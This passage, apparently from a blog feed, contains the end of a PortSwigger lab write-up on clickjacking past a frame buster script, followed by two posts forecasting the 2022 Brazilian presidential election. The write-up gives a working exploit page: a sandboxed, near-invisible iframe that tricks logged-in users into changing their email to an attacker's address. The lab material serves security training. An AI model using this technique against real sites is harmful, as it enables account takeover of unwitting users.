</code></pre><p>This is how the template looks on our exploit server:</p><figure class="kg-card kg-image-card"><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/1-1-.png" class="kg-image" alt="Portswigger’s lab write up: Clickjacking with a frame buster script"/></figure><p>We can read the message <code>This page cannot be framed</code>; this happens because the website enabled a frame buster script, so we cannot render an iframe on this site. A workaround we can try is to add the <code>sandbox</code> attribute to our exploit’s iframe and set it to <code>allow-forms</code>; this will skip the frame buster script and render the iframe. This is how the exploit looks now:</p><figure class="kg-card kg-image-card"><img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/2-1-.png" class="kg-image" alt="Portswigger’s lab write up: Clickjacking with a frame buster script"/></figure><p>We need to modify the location of the <code>CLICK ME</code> div tag so that it is on top of the <code>Update Email</code> button on the vulnerable website. Note that we are setting the iframe’s opacity to <code>0.1</code> to be able to check the exploit appearance and then modifying the div’s top and left CSS properties so that when a logged in user clicks on the <code>CLICK ME</code> div on our website, they are actually clicking on the vulnerable website’s button to update their email to whatever we previously set in the URL parameters. After setting the top property to 450px and the left property to 50px, it looks like the buttons are aligned to perform a successful attack. At this point, our exploit looks like this:</p><pre><code class="language-jsx"><head>
<style>
iframe {
position:relative;
width:700px;
height:600px;
opacity:0.1;
z-index:2;
}
div {
position:absolute;
z-index:1;
top:450px;
left:50px;
}
</style>
</head>
<body>
<div>
CLICK HERE
</div>
<iframe sandbox="allow-forms" src="${LAB_ACCOUNT_ROUTE_URL}?email=attacker@email.com">
</iframe>
</body>
</code></pre><figure class="kg-card kg-image-card"><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/3.png" class="kg-image" alt="Portswigger’s lab write up: Clickjacking with a frame buster script"/></figure><p>All we need to do is set the iframe’s opacity to 0.00001 or something similar so that it is almost invisible and send the exploit to our victim.</p><p>Check out this post on:<br>Medium: <a href="https://medium.com/@artofcode_/portswiggers-lab-write-up-clickjacking-with-a-frame-buster-script-23f7322bb4a3">https://medium.com/@artofcode_/portswiggers-lab-write-up-clickjacking-with-a-frame-buster-script-23f7322bb4a3</a><br>Dev.to: <a href="https://dev.to/christianpaez/portswiggers-lab-write-up-clickjacking-with-a-frame-buster-script-3eap">https://dev.to/christianpaez/portswiggers-lab-write-up-clickjacking-with-a-frame-buster-script-3eap</a><br>Github: <a href="https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/clickjacking/clickjacking-with-a-frame-buster-script">https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/clickjacking/clickjacking-with-a-frame-buster-script</a></br></br></br></p></hr>]]></content:encoded></item><item><title><![CDATA[Who will win the 2022 Brazilian Presidential Election?, according to statistics.]]></title><description><![CDATA[Many news outlets have run opinion polls on presidential candidates for the Brazilian 2022 election; what does this data tell us about a possible winner?.]]></description><link>https://artofcode.tech/who-will-win-the-2022-brazilian-presidential-election-according-to-statistics</link><guid isPermaLink="false">Ghost__Post__635daa854acf03001d269e08</guid><category><![CDATA[blog]]></category><category><![CDATA[datascience]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sat, 29 Oct 2022 22:44:15 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/phil-scroggs-u1JI6dw1vg8-unsplash.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/phil-scroggs-u1JI6dw1vg8-unsplash.jpg" alt="Who will win the 2022 Brazilian Presidential Election?, according to statistics."/><p>Tomorrow, A new President will be elected to lead the Federative <em>Republic of Brazil</em>, since this has become a popular topic in the media, many news outlets have run opinion polls on presidential candidates; what does this data tell us about a possible winner?.</p><h3 id="is-it-possible-to-predict-a-winner-for-the-election-using-opinion-polling-data">Is it possible to predict a winner for the election using opinion polling data?<br/></h3><p>The short answer is yes, if you want to know more about the use of inference to make this prediction feel free to read our previous post regarding the power of opinion polling data: <a href="https://artofcode.tech/who-will-win-the-2022-colombian-election-according-to-statistics/">https://artofcode.tech/who-will-win-the-2022-colombian-election-according-to-statistics/</a>, or go directly to our current forecast:</p><h3 id="check-out-our-current-forecast-here-https-artofcode-tech-2022-brazilian-election-forecast-">Check out our current forecast here: <br><a href="https://artofcode.tech/2022-brazilian-election-forecast/">https://artofcode.tech/2022-brazilian-election-forecast/</a></br></h3><p/><h3 id="how-to-interpret-this-model">How to interpret this model?</h3><figure class="kg-card kg-image-card"><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Rplot.png" class="kg-image" alt="Who will win the 2022 Brazilian Presidential Election?, according to statistics."/></figure><p>Lula's chances of winning according to our model are over 95%, which in statitistics can be interpreted as certainty, this basically means that we are sure that he will be the winner of the election, if you want to know more about how we made this prediction feel free to check our inference model on Github.</p><h3 id="references-">References:</h3><p>Forecast: <a href="https://artofcode.tech/2022-brazilian-election-forecast/">https://artofcode.tech/2022-brazilian-election-forecast/</a><br>Github: <a href="https://github.com/christianpaez/brazilian-election-analysis-2022">https://github.com/christianpaez/brazilian-election-analysis-2022</a><br>Image credit: <a href="https://unsplash.com/@phillustrations">https://unsplash.com/@phillustrations</a></br></br></p><p>Check out this post on:<br>Medium: <a href="https://medium.com/@artofcode_/who-will-win-the-2022-brazilian-presidential-election-according-to-statistics-18bb18ceec19">https://medium.com/@artofcode_/who-will-win-the-2022-brazilian-presidential-election-according-to-statistics-18bb18ceec19</a><br>Dev.to: <a href="https://dev.to/christianpaez/who-will-win-the-2022-brazilian-presidential-election-according-to-statistics-5c92">https://dev.to/christianpaez/who-will-win-the-2022-brazilian-presidential-election-according-to-statistics-5c92</a></br></br></p><p/>]]></content:encoded></item><item><title><![CDATA[2022 Brazilian Election Forecast]]></title><description><![CDATA[Luiz Inácio Lula da Silva has a 96% chance of winning the 2022 presidential election(Second Round).]]></description><link>https://artofcode.tech/2022-brazilian-election-forecast</link><guid isPermaLink="false">Ghost__Post__635d9e764acf03001d269de7</guid><category><![CDATA[Projects]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sat, 29 Oct 2022 22:04:27 GMT</pubDate><media:content url="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/scott-graham-5fNmWej4tAA-unsplash.jpg" medium="image"/><content:encoded><![CDATA[<!--kg-card-begin: html--><body>
<h1 class="title toc-ignore">Luiz Inácio Lula da Silva has a 96% chance
of winning the 2022 presidential election(Second Round)</h1>
<h4 class="author">By: Christian Páez</h4>
<h4 class="date">Last updated: 2022-10-29(Ended)</h4>
<img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/scott-graham-5fNmWej4tAA-unsplash.jpg" alt="2022 Brazilian Election Forecast"/><p>This statistical model attempts to make a probabilistic statement
about Luiz Inácio Lula da Silva’s chances of winning the 2022 Brazilian
Presidential Election(Second round), this was accomplished using public
polling data, statistical inference, the Bayes theorem and some analysis
of previous elections.</p>
<div id="section" class="section level2">
<h2/>
<p><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAqAAAAEgCAIAAADkBlbXAAAACXBIWXMAAA7DAAAOwwHHb6hkAAAgAElEQVR4nO3deVwT59o38HuykIQlLLKERRAFNyoqi4IKiPuObV0etVW0VVt3q221x7Zqq8Vj60ePPeqp59SlWGmtPa1PaxW0mwtYAVG0uG/IIvsSlqzz/jHPyckLIQmQEGb8ff9K7rnnmuvOTHJllkwomqYJAAAAcAvP1gkAAACA5aHAAwAAcBAKPAAAAAehwAMAAHAQCjwAAAAHocADAABwkLkFPj09ferUqT4+Pp6enuPGjcvMzNSf+ujRoxdeeMHT07N3797r1q1Tq9Xmz2t8qr758+dTegQCQffu3ZcuXVpeXm72eFuhT58+8+fPZx4PHDhw+vTpzdst6O9//zvVgk8++aRJDm2Wmpr6/vvv655aaSyEkPLy8rfffjs0NNTR0bFLly7Dhg37/PPPrbGgdoqJiZk8ebLBSYcOHWqyIphN7tVXXy0oKOjgPBktZbtx40aKor777jv9xhkzZlAUdfjwYf3GV199laKoP/74g1hz7QNAZyAwp9PZs2cnT57s7++/bNkyHo+3d+/eIUOG/PHHHwMGDCCEFBcXDxo0yMHBYdWqVUVFRZ988smdO3eOHz9uzrzGpxq0bds2Pp9PCGloaLh69eq+ffuysrLOnz8vEJg1FvP5+/t7enqa324Ry5cvDwgIaNIYFxdnqfjnzp3buXPnpk2bmKdWGktFRUVERERZWdnLL7/82muv1dTUpKamvvLKK+np6fv377f44qxq0aJFPXv2ZB43NDRcuXLl888/z8jIyMrKEolEts1NJz4+ftOmTRcuXJg6dSrTotVqz549Swg5ffr03LlzdT3T09MdHR3DwsKIlbdkALA92gzh4eF+fn4lJSXM0+LiYjc3t/HjxzNP3333XYlEcufOHebpxx9/TAjJzc01Z17jU5tITEwkhKjVav3GtWvXEkLOnz/fvH91dbU5ozPHgAEDpk2b1ubZ1Wq1RqMx3ufTTz8lhGRkZFgpB8aGDRscHR3bE8Gcsaxbt44QcvnyZf3GN954gxDy+++/t2fp5jMnT5qmhw0bNmnSJIOTDh48SAg5c+ZMk/YlS5YQQk6dOmWBLP+jndk2NjZKJJLo6Ghdy+XLlwkhgYGBHh4eWq2WaaysrKQoqqX3lzmZmJlnSyz4lgQAk0wfolcqldnZ2TNnzvTw8GBavLy8Ro4cqTuWvn///pEjRwYFBTFPX3nlFYFAwOyoGZ/XZGRzMHu3paWlzNPIyMjVq1enpqYOGjRo6dKlTOOBAwcGDRrk7Ozs7u4+atSoixcvMu1Pnz5tfjw8OjqamdqvXz+DBzCbtLcUnBASHR29fPnyrVu3uri4CIXCHj167N692/yhGZeTkzNx4kRPT08PD4/p06ffvn1bf+oPP/wQFxfn7Ozcv3//jRs3ajQaQkhMTMyHH34ol8t1h/2bjCUtLW348OGurq5BQUELFiyoqKho21iys7O9vLwiIiL0GxcvXtytW7ebN2+2Zwjtz3Pv3r3h4eHOzs5xcXG//PKLiVfZkNGjRxNC7t27Z04+wcHBr7/+uv7sQqFw27Ztls1WJBJFR0dnZWUpFApdSiKRaMOGDaWlpdnZ2UzjpUuXaJoePnw481R/7RvPxGSeRlalwbckAHQAswr8+++//+KLL+o33r9/XyKREELq6uqKi4uHDh2qm+Ti4tK3b1/mM8X4vManmuncuXMURcXExOha/vzzz9mzZ8fExMybN48QkpSUtGDBgm7dum3fvv3VV1+9f//++PHjmY9gFxeXH/Qwxx6ee+4585duJDjjxIkT27dv37Bhw+HDh728vFasWHH69Gnz47fk999/j4qKKi0tfeedd954442MjIyoqKi7d+8yU7/44ospU6bY29t/9NFHcXFxW7ZsmT17NiHkn//854IFCyQSSWZm5ksvvdQk5rFjx8aNG9fY2Lhx48aZM2d+8803YWFhcrm8DWPx9PQsKSlpcva3Z8+eDx48WLhwYXuG0M4833///SVLlri4uGzcuDEoKGjChAl5eXmtffGZb5N+fn5m5mOcpbKNj49XKpW6L8dpaWlDhw5NSEjg8Xi6gOnp6UzP1mZifKrxVUmavSUBoIO0Ya//+++/pyhqzZo1NE0zX9U/++wz/Q4jRowIDg42OW9rpzKH6D/55JOdO3fu3LkzKSlp1qxZ9vb2R44c0fVh9hp/+eUXXcvgwYODg4N1B/YvXLhADB13bWhoCA0NDQ4Orq2tZVqee+65xMRE5rH+4XH9duPBo6KiiN5B6dLSUh6Pt379eoOjYw7Rr1q1amczT58+bZJDWFjYoEGDdMstKipycXGZPXs2MxAfH5+JEyfqDswye2n5+fl0s0P0urGoVKru3btHREQoFApm0vnz5wkhW7dubcNYbty4wRyVCQwMXLp06fHjx8vKypr0adsQ2pNnUVGRRCKZMmWK7iDzhx9+SAgx/xB9Q0PDuXPnAgMDw8LClEqlOa9bUFDQa6+9ph9WIBAkJSVZPFtmudu2baNpuq6uTiQSffTRRzRNR0ZGxsXFMX3Gjh3r5OSke831t2Tj69f4VCOrkjb0lgSAjtG6Aq9Wqz/++GM+n9+/f3/mdBpzRPro0aP63RISEvz8/EzOa/5UBlPgm3Bzc9u9e7euT0RERM+ePfXnUigUKpVK9/To0aOEkB9++KFJ8EWLFolEouzsbF2LOQXeePCoqKjevXvrL8XT03PVqlUGR8cUeIMyMzP1cygsLCSEfP755/qzz5o1y9vbm6Zp5kCu/hniR48e7du3r7CwkG65wOfm5hJCDh48qB9z0KBBMTExbRgLTdNPnz7dvn37iBEjmOMxFEUNGzbsxx9/ZKa2eQjtyfPLL78khKSnp+smVVdXi0Qi4wW+ubCwsKqqKqaPyXxMFnhLZatUKh0cHBISEmia/umnn8h/roH4y1/+IhQKa2pqtFqti4vLhAkTdLM0KfBG1q+RqcZXJW3oLQkAHaMVV57n5OTMnz8/Jydn7ty5u3fvlkqlhBAXFxdCSJMDkjU1NW5ubibnNXNqE2q1mrmKnhBSVla2Y8eO5cuXKxSKNWvWMI3dunXT729nZ3f27NlTp07dvHnz9u3bd+7caR4zJSXls88+271798CBA817McwN3iQZHs/EOZGMjIzBgwcb78MsZcGCBQsWLNBvFwqF5D/nhnv37q1r9/f3X7x4sfGY9+/fJ4T06dNHv7FPnz5nzpzRPW3VWDw9PdeuXbt27VqlUnnp0qUff/xx//79kyZNOnr06MyZM9s8BObasbblyRw01j8FI5VKm/9moQn9q+iZY+Dffvvtu++++7e//Y2Y97oZZ6lshULh0KFDmWNIaWlpbm5uzKXyY8eO3bJlyy+//BIUFFRVVdXS8XkjmRifanxVGpwXADqGuQX+b3/729q1a0NDQy9cuDBkyBBdu0wmI4Ton3Vmnvr4+Jic15ypxrm7u2/duvXf//73/v37dQXe3t5ev8+bb7758ccfx8bGxsXFzZo1y9PTk7lISufu3buLFi2aOnXqsmXLWrV0c4Jb/Md7hBCxWEwI2bt3b2RkZPOpSqWSEKL7DmQm2tC/BvN4PP1bGpg5Frlc/v3330dGRjJ10c7OLiYmJiYmZsWKFc8999z27dtnzpzZ5iG0J0+D7U22luZmzJgxcuRI/ZaZM2f+4x//2LZtm0QiMSefJrRarcms2pZtfHx8amrq7du309LSRowYwdTg6OhoqVR6+vRp5tIB3RV2Zi7R5FTjq9KctAHASsy60U1ycvLKlSuXLVuWkZHRpAa7urrKZLJLly7pWuRyeV5enm73y8i8JqeaydfXt6amxuCkioqKHTt2vP/++7/99tvmzZtnz56t/82DEKJQKGbMmOHq6tqG27CYDG4l3bt3J4RQFBWup7y8nLnhD/NzBv1jCQUFBa+//npOTo7JmLdu3dJvvHnzZo8ePdqQ4UsvvdT89fTx8QkKCqqvr2/PENqTZ2BgICHkxo0buhaVSsXsgrdKVFSUUqksKSkh5r1u+l8Cnjx50qTAWzBbZu/8+PHjubm5ui+aAoFgxIgRp0+fTk9Pl0qlrT1GZZLxVQkANmS6wGs0mnfeeSc2NnbHjh0Gv8W//PLLqampzKk4QkhKSopSqWQulzU+r8nI5igrK8vMzAwNDTU49d69e1qtVr/unjhxQr/DG2+8kZube/ToUVdX19Yu2mRwK3F3dx86dOiuXbuqqqqYlitXrkyYMIG5scngwYOZ6xJ0/Q8dOrRv3z7mZAppYSe4d+/e3bp1+/TTT1UqFdOSnp6enp4+bty41qbn6OgYGxu7b9++Jl8psrKyrly5whShNg+hPXmOGDHC3t6eOf/NtHz22WctfTU0grm/DTOjyXxEIpH+N5UDBw6YuZQ2ZBseHu7k5LRjxw5CyKhRo3TtY8aMuXfv3nfffRcbG9vaQzsmGV+VAGBDpstqdnZ2fn5+SEiI7vZnDKlUunr1akLI0qVLk5OTJ0yYsHLlyqKiog8//HD69OnMreiMz2syskG7du3SPwefnJxcU1OzYcMGg51DQkK8vLy2bNkil8u9vLx+/PFH5mLjEydOhIeHZ2dn79mzZ/LkybW1tfq/CBo9erTJk+UmgzMnL1orJSUlIyOjSaNMJps5c6Z+y0cffTR69Ohhw4bNnTtXKBTu2rXL3d19xYoVhBCpVPrBBx8sXbp0ypQpkyZNunv37q5du1566SXmPKiDg0NdXd2//vWv2NjY4OBgXUChUMj8KiE+Pn7WrFklJSU7d+4MCAgwsiKM2L9/f0JCQmRk5AsvvNC7d287O7tbt259++23AQEBzKXg7RlCm/NkLgvYvHnz2LFjp0yZkpeXd+DAgZCQkNaOzsHBgRDy6NGjfv36mXzdYmJi9u3bt3LlytjY2PPnz+/evdvM+9+1IVuBQBATE3Py5MnAwEBmx5oxduxYQkh5ebmR4/PtYWRVAoAtmbwMLyUlxeCM+tfJ37lzJyEhwcPDo3fv3m+++abuwnLj85oTWV/zq+idnJyio6PPnj2r6xMRETF16lT9uS5fvjxs2DBHR8egoKCVK1fW1tbOmzfP0dExOTk5KSnJYAKNjY20eVfRGwlO03RUVFSTa55lMlkbrqKPioqim93JLjMzc8yYMV26dPHy8po2bdrt27f1o3399dfR0dGOjo49evR455136uvrmfZHjx4NHjxYLBbv2bOnyVhomj516lRsbKyLi0v37t3nz59fXl6um9SqsdA0XVNT8+abb8bFxbm5ubm6ug4YMGDjxo36Ads8hHbm+fe//z0sLMzJyWnYsGGnT59+7bXXWnsnO+YeD2FhYebkU11dnZiY6O7uTghhil/v3r31r6K3VLaM7du3E0IWLVrUpJ0568H8HEOnyVX0RjIxmaeRVdn8LQkAHYOiDR2wBQDLqqysFAqFjo6Otk4EAJ4VKPAAAAAchP+DBwAA4CAUeAAAAA5CgQcAAOAgFHgAAAAOQoEHAADgIBR4AAAADkKBBwAA4CAUeAAAAA5CgQcAAOAgFHgAAAAOMv1vcmVlZR2QR3swf8+lUChsnYgVCYVCZ2fnyspKjUZj61ysSCKRqNVq3V+vcpJYLHZ0dGT+kMbWuViRo6NjQ0MDtzdXe3t7iURSzvV/vpdKpW34V2WDmH9dgg6DPXgAAAAOQoEHAADgIBR4dqBqa0lWFsXp0xAAAGBBKPDswM/MJBERvPx8WycCAADsgAIPAADAQSjwAAAAHIQCDwAAwEEo8AAAABxk+kY30Bloe/QgSUnaLl1snQgY8P777x84cECr1ZrTmaIoQoj5d7lxcnLau3fv8OHD25weADybUODZQevvT95+m66sJJy+NRhL5efnN9jbk+ihlg+tUCjSTlvqPmIA8ExBgQewBN+uZM1blg9bWUHSTls+LAA8A3AOHgAAgINQ4AEAADgIBR4AAICDUODZAbeqBQCAVkGBZwf82QwAALQKCjwAAAAHmf6ZnJOTUwfk0R58Pp8QYmdnZ+tErIgvEhFCJBKJqNOvjvbg8/l2dnZm3jGm8xAKhVaNLxaLO//bsAmBQMDj8cy/nw8b8fl8iqJYt2paSyAQcH6MXGW6wPN4nX0vn7k1WOfPsz3+O8ZnZJiWVlpaevDgwYKCAotHJoRcvXqVOFjxE5DH47Fu86b+w9aJWNGz8MnDeBbGyEmmC3x1dXUH5NEeIpGIEKLg9PlpCUU5dO8uVyhUnX51tIdEIlGr1SqVyuKRMzMz//KXv1g87H+FDrBe7Pr6+s7/NmzC0dGxoaFBw+kbL9rb20skEtatmtaSSqWWupeiu7u7ReKAmXAnO3ZQR0WRe/e0uFVtO/1tDwkIsHzYBfMsHxMAoH1Q4OFZ4uBApM6WD8vj8oFoAGApnFkBAADgIBR4AAAADkKBBwAA4CAUeHbgPX5Mtm2jKittnQgAALADCjw78O7dI+vW8crLbZ0IAACwAwo8AAAAB6HAAwAAcBAKPAAAAAfhRjfQiXz00UcnTpywxj+U1NXVWTwmAEBnhgLPDpoBA0hamtbX19aJWNexY8duPykgLi6WD40CDwDPGBR4dqBdXcmoUTTX70UvEAjIiJFkzVuWD338GPl0l+XDAgB0VjgHDwAAwEEo8AAAAByEAg8AAMBBKPAsoVIRrp+ABwAAC0KBZwfB+fPEzY3/4IGtEwEAAHZAgQcAAOAgFHgAAAAOQoEHAADgIBR4AAAADkKBZwfa05NMn047Oto6EQAAYAfcqpYdNCEh5OuvtfilHAAAmAd78AAAAByEAg8AAMBBKPAAAAAchAIPAADAQSjw7MC/cYPMmMErLrZ1IgAAwA4o8OxAlZSQY8coudzWiQAAADuY/pmcg4NDB+TRHnw+nxAiEHD5J38COztCiEgkEnb61dEeFEXZOoXOSCQSdf63YRMCgUAikdA0betErIj5zGHdqmktPp/P+TFylemi2NjY2AF5tIednR0hRKlU2joRKxKr1UJCVCqVqtOvjvbgdj1oM5VK1fnfhk3weDyFQqHVam2diBWJxWKBQMC6VdNaFhyjRCKxSBwwk+kCr+n0d1ZhPkQ6f57twYxRq9Vye5hgEBvXO03TbEy7VZjvo9weIyGEpmnOj5GrcA4eAACAg7h83ppL1PHxhKY1uFUtAACYB3vwAAAAHIQCDwAAwEEo8AAAAByEAg8AAMBBKPDsQFVWkjNnqIYGWycCAADsgALPDvycHDJ6NK+gwNaJAAAAO6DAAwAAcBAKPAAAAAehwAMAAHAQCjwAAAAH4Va17KDt3Zv84x9aDw9bJwIdS6MhhJw/f76urs4a4YODgyMiIqwRGQBsDgWeHbTe3mTRIhr3on/W1NYSQg4cOHDgwAFrhHdxcblz5441IgOAzaHAA3R6ry4m4eGWD3vie/4fGZYPCwCdAwo8QKfn60d697V82IsXKIqyfFgA6BxQ4KF1CgsLf/rpp+rqamsELy8vJ92DrBEZAOBZgwIPrZOWlrZu3TpbZwEAACagwLOD4Px58vLLvLQ0TUCArXMhhBBy6Ajh8y0fdv7Llo8JAPBMQoFnCZWKVFZSWq2t8/gPH18isMLGg1PCAAAWghvdAAAAcBAKPAAAAAehwAMAAHAQCjw70E5OJDycFolsnQgAALADLrJjB01EBMnM1OJWtQAAYB7swQMAAHAQCjwAALDDqlWrnJ2dtXo/GPb19Q0JCdE9VSgUIpFo06ZNCoWCoqirV6/aIs3OAgUeAADYYfjw4TU1NTdu3GCe5uXlFRYW/vnnn0+ePGFarly5olQq4+Li+Hz+2rVrPZ7tv9hGgQcAAHaIjY2lKOrixYvM0zNnzvTv39/b2zstLY1pycjIEIlEUVFRAoFg+/btPj4+1kijvr7eGmEtzvRFdgJr3LDMovh8PmFDnu0hfPiQHD0qWLSIcnOzbSY8Hr4UcgdFUVZ64/B4PD6fz+1/q2PeC9z+5CHW3EjawM3NLTQ0ND09ffHixYSQM2fOjB49urS0NDU1df78+YSQ9PT0wYMHi8VihUIhFotzcnL69+8vFAqPHTu2YcOG+/fv+/j4bNu27cUXXySEtNReU1Pz1ltv/fTTT1VVVbGxsXv37vXz8yOEUBSVkZHx3nvvicXi77//3qavhFlMrzYXF5cOyKP97O3tbZ2CNV2+TLZtc5o/n9h6dXD8dX7GUBRlvTe4nZ2dlSJ3Kmz5hGyPTjXG4cOHnzx5khCiVqt//fXXJUuWlJeXr1y5kqZppgDPmzev+VzLli3buXNnnz59Pvzww5deemnixIlisbil9ueff16r1X7xxRcSiWTnzp1jx469cOEC8yKsXr166dKlcXFxHTzqtjFd4K30x6AWJBQKCSEqlcrWiViRqLFRTEhdXZ3a1qujoaHBtgmABdE0baU3uEQiUSqVGk7/qlMkEolEopqaGlsnYl0ODg51dXUWCeXs7Nz+IMOHD9+1a1dpaendu3cbGxtjYmLkcnl5efmVK1e8vb0fP35ssPouXbp02rRphJBNmzalpKQUFBT06NHDYHtZWdm5c+dKSkqYin748GFfX9/jx4+/8sorhJDJkyfPmTOn/aPoGKYLfOcvnMyBss6fZ3sINBpCiEajsfkwuf2R/ayhadpKW5RIJFKpVNzeWp6FXQtCiFar7VRjZE7DZ2Rk5OTkREdH29vb29vbDxgwIDU1tWfPnkKhMDo6uvlc4eHhzIMuXboYb8/Ly1OpVPpX56nV6sLCQuZxWFiYxUdkPZ3lzAoAAIBJzGn4ixcvXrx4cfTo0UzjmDFj0tLSKioqBg0aZPA0oqiF24A2b3d2dpbJZEVFRQb7Ozo6tiP3joYLpgAAgE2GDx+elpaWnp4+atQopmXMmDHnz58/e/Zs+8+Oh4SEPH36NC8vj3laUFAQFRV17dq1doa1CRR4dtBER5N79zQBAbZOBADAxoYPH56VlSWRSCIjI5mWoUOHCgSC7Ozs9hf4nj17Pv/881OnTj116tTPP/88Z84cuVyufy8dFkGBZwdaLCbduxOh0NaJAADYGHMafvjw4cxvpAkhIpEoLi5OIBAMGTKk/fG/+OKLkSNHLly48MUXX3R1df3xxx91C2IXnIMHAAA2cXNz079bLYP57ZyOSCSiaZp5rH+RYJcuXUy229vb79mzZ8+ePU0WoevAFtiDBwAA4CAUeAAAAA7CIXp2oBobSXk5cXQkuFMsAACYAdWCHfjp6aRHD/6jR7ZOBAAA2AEFHgAAgINQ4AEAADgIBR4AAICDUOABAAA4CAWeHbT+/uTtt7Wd6V+ZAQCgM8PP5NhB26MHSUqiKysJp/9/EwDAiHHjxv3888/tiRAcHHzjxg1L5dPJocADAAA7qFSqIKlTYmjfts3+/Z37JUqlZVPqzFDgAQCANQJdpCsjB7Zt3ofVNWk19ZbNpzPDOXgAAAAOQoEHAADgIBR4duBfvUpGj+YVFto6EQAAYAcUeHagKirImTNU/TN09ggAANoDBR4AAJ515eXlFEWJxWKJRGJvbz9kyJA///yzpc5ZWVnR0dEdmV7boMADAAAQQkhdXV1DQ0N1dXWvXr2WLVtmw0yUlvg5Hwo8AADAfwmFwtmzZ+fn5zNPv/zyy+DgYF9f3/nz59fV1en3VKlU8+fP9/T0lMlku3btaqn/1atX4+Pjn3/+eT8/v/j4+JycHKZnUlJSQECAm5tbfHx8cXExISQrK2vSpEkrV66cOHGi8UWbA7+DZwmhkLi60jx8IQPLeXC/srIyJCTEGrGdnJw2bNgwadIkawQHsKr6+vrDhw9PnjyZEHLnzp3Vq1f//vvv3bt3nzNnzpYtW7Zu3arreezYsdu3bz98+PDRo0fh4eGvvvpqYWGhwf6//vrrkSNHvv3221WrVn388cfJycm3b9/eunVrbm6ut7f33LlzDxw4sH79ekLIzz//PHny5B07dhhftDlQ4NlBPWwYqajQ4la1YEHV1RqKV9LV3xqxS3Ku3LlzxxqRAazHwcGBoiiNRiORSC5dukQIOXHixIwZM3r16kUIWb9+/Zw5c/SrrIeHR1lZ2bVr1wYPHlxfX2+kv6Oj4/Tp0ymKmjhx4u7duwkhgYGBDx8+dHNzKykpoSiqpqaGienm5rZ48WKTizYHCjzAM8zJiXy80yqRJ42zSlgAa6qrq+Pz+Vqt9sSJE5GRkU+fPi0qKuratSsz1d/fv6ioSL//iBEjZs6cOWPGDIVCsXjx4s2bN7fUv1evXkKhkBDC5/N1s2/evPn48eN+fn58Pr9bt25Mo6+vL/PA+KLNgUO+AAAA/8Xj8aZOneru7p6dnS2TyZ48ecK0FxQUyGQy/Z5FRUXLly9//Pjx6dOnk5OTL1++3FJ/iqKaLCUlJSUzMzM3Nzc9PT0hIUF/6cwD44s2ayCtnQEAAIDDaJo+efJkUVFRUFDQpEmTvv7663v37qnV6qSkpClTpuj3PHz48MKFCysqKgICAvh8vlwuN95fX1lZmYeHh1QqLSsrO3TokEqlatLB/FAtMX2Ivvn3js6GybDz59keujHafJg2TwBY5FnYWjBGLnF2dmbOwXt4eHz++ecymUwmk23fvn3cuHENDQ0jR45899139fsvWbLk/PnzQUFBYrF4/vz58fHxhBAj/fXNmzcvIyOjV69eAQEBK1as2Lhx46xZs/Q79O7d28xQLTFd4B0cHFobtIMxpzQEAi5fT8AvLiYpKZKEBNrZ2baZ2NnZ2TYBYAuhUNj5Pz3ag/nM4fYYCSECgYDzYySEdOnShaZpg5Nefvnll19+Wb8lPDw8PT2dEOLi4nLy5EmT/fv373/58mXm8ciRI0eOHEkIcXNz++qrr3R9Fi1axDxgIrcUqlVMF0W5XN7m6B1DJBIRQhQKha0TsSJJTo5w8WLFwIHKwEDbZsLt1xksSKVSdf5Pj/awt7eXSCTcHiMhRCqVWmqMYrHYInHATDgHDwAAwEEo8C0qUaEAABZqSURBVAAAAByEAg8AAMBBXL4wDQAAOOZcfmHY50faNm+xvN7Nz8+y+XRmKPDsoAkJIV9/rTX7Rgd9+vSpqKiwRiYtXWgKAGBt48eP193xrW28vLwslAsLoMCzA+3pSaZPp82+F31lZaU2LJz07mv5VC6cIw/uWz4sAIAp586d+/XXX9sToUePHq29ozt7ocBzE0VRZFAUmT7T8qGLi1DgAcAm5HJ5jbMLGT22jfNnXKytrbVoRp0aCjwAALCHnx95eV4b562sILlXLZpNp4ar6AEAADgIe/AAYAWKxt27dx84cMAasbt373706FGJRGKN4ACcgQLPDoJffiHPP8//4w+NrW9VC2AWjabWwbHW0wpXLFdWFl24oFQqUeABjEOBBwDrmDCp7edKjUg7TbZ+YPmwAJyDc/AAAPCsq66uZv4o1ni3rKys6Ojojkmp/VDgAQAAOAgFHgAAoKnffvtt9OjRzOPjx483/1/2pKSkgIAANze3+Pj44uLiDk/QNBR4dvi/O9k5Oto6EQAAILdv3966devvv/9eXFzs5eVlpR+MtBMusmOH/7sXvdm3qgUAAOsJDAx8+PChm5tbSUkJRVE1NTW2zsgA7MEDAAAYY/BPtjZv3ty1a9eEhIT8/PyOT8kcKPAAAAAGaLVa5sGtW7eaTEpJScnMzMzNzU1PT09ISOjw1MyCAg8AANCUk5NTVlZWWVlZXV3dV1991WRqWVmZh4eHVCotKys7dOiQSqWySZLGocADAAAQQoizs7PTf9TV1SUmJoaFhXXt2jU8PLxJz3nz5tnZ2fXq1et//ud/VqxY8eWXX2ZlZdkkZyNwkR078G7dIv/6F2/NGo2bm61zAQDgGmdn5+Yn2mNiYnbu3KnfEh4enp6eTghxc3PT361ftGhRByTZWtiDZwdeYSH57DOqutrWiQAAADugwAMAAHAQCjwAAAAHocADAABwEC6yAwAA9si9Rl5f2MZ5i4uJexeLZtOpocCzg3rYMFJRYfKvDAEAOCw+Pt7T07MdAfrLZDKLZdPpocCzhFBInJ0J7kUPAM+wDRs22DoFNsE5eAAAAA4yvQfv7OzcAXm0B4/HI4SIxWJbJ2JFFEURQpycnAz+5wHAs0Yqldr8o4nH41EUZfM0rI3P53N+jFxlusDr7rbfaTHFr/Pn2R7M